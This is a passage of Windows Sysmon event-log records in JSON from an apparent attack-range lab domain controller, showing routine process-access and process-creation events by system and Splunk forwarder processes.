{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8864,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.810\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.810","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8865,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.810\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.810","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8866,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.810\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.810","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8867,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.810\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.810","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8868,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.810\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.810","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8869,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.810\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A3-5F25-0000-00104BB51000}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.810","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-13A3-5F25-0000-00104BB51000}","TargetProcessId":"4116","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8870,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.935\r\nSourceProcessGUID: {E2A3D6B1-13A3-5F25-0000-00104BB51000}\r\nSourceProcessId: 4116\r\nSourceThreadId: 2988\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.935","SourceProcessGUID":"{E2A3D6B1-13A3-5F25-0000-00104BB51000}","SourceProcessId":"4116","SourceThreadId":"2988","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8871,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.375\r\nProcessGuid: {E2A3D6B1-13A4-5F25-0000-00100BBB1000}\r\nProcessId: 212\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.375","ProcessGuid":"{E2A3D6B1-13A4-5F25-0000-00100BBB1000}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8872,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.373\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-13A4-5F25-0000-00100BBB1000}\r\nTargetProcessId: 212\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 